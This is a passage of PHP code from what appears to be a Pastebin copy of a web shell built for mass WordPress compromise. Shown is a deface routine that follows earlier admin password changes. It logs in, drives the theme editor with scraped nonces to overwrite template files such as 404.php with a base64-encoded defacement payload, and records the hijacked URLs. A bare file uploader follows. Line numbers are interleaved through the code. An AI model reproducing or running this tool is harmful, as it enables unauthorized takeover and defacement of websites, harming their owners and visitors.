false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="green">[#] 

777
778
User Pass Changed </font><br>';

779
		$post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1';

780
		$def="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."'))); 

781
782
exit; ?>";

783
		$buffer0 = CurlPage($site_url.'/wp-login.php',$post);

784
		

785
		if(!preg_match("/logout/i",$buffer0))

786
		{

787
			echo "<font color='red'>[X] FAILED TO LOGIN</font><br />";

788
		}else{

789
		echo "<font color='green'>[#] LOGGED IN :D</font><br>";

790
		$urlz = $site_url."/wp-admin/theme-editor.php";

791
		$themeditor = CurlPage($urlz,$cookie,null);

792
		

793
		if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened<br /></td>"; } else { echo "error 

794
795
opening theme edtitor!</td>"; }

796
			

797
		$nola = explode(Chr(10),$themeditor);

798
799
		foreach($nola as $nline){

800
		if(preg_match('%theme-editor\.php\?file=%',$nline) && 

801
802
preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){

803
		$modify[Find($nline,'(',')')] = Find($nline,'<a href="','"');

804
		}

805
		}

806
		

807
		echo '<td>';

808
		if(is_array($modify)){

809
		foreach($modify as $met=>$indfile){

810
		$nri = str_replace('.','_',$met);

811
		$nri = "n".$nri;

812
		$indfile =str_replace("&amp;","&",$indfile);

813
		$url = trim($site_url."/wp-admin/".$indfile);

814
		$themepage = CurlPage($url,"");

815
		$_wpnonce = Find($themepage,'name="_wpnonce" value="','"');

816
		$_file = Find($themepage,'name="file" value="','"');

817
		$nfile = explode('themes',$_file);

818
		$jfile = $site_url."/wp-content/themes".end($nfile);

819
		//Update file

820
		$url = $site_url."/wp-admin/theme-editor.php";

821
		$postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";

822
		$themedied = CurlPage($url,$postme);

823
		if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){

824
		

825
		$theme = Find($themeditor,'<li><a href="theme-editor.php?file=404.php&amp;theme=','">404 Template');

826
		if(preg_match("/twenty ten/i",$theme)){ $theme = "twentyten"; }

827
		elseif(preg_match("/twenty eleven/i",$theme)){$theme = "twentyeleven";}

828
		$theme = trim(str_replace("/","",$theme));

829
		$d =  $site_url.'/wp-content/themes/'.$theme.'/404.php';

830
		listall("wp.txt",$d.Chr(10));

831
		}

832
      	}

833
		

834
		echo '<a href='.$d.'>LINK</a><br />';

835
		echo '</td>';

836
		

837
		}}

838
		########################END DEFACE#################

839
840
			}else{

841
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

842
843
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">[x] 

844
845
mysql fail</font></td>';

846
			}

847
		}}}}}

848
			

849
		

850
		

851
852
break;

853
854
855
856
// Uploader

857
case 'uploader':

858
859
echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

860
echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" 

861
862
value="Upload"></form></center>';

863
if( $_POST['_upl'] == "Upload" ) {

864
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana" 

865
866
size="1"><font color="white"> Done !!</font><br>'; }

867
	else { echo '<font color="#FF0000">Failed :( </font></p>

868
	</td></table></tr>

869
870
'; }

871
}

872
873
874
}}

875
?>
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!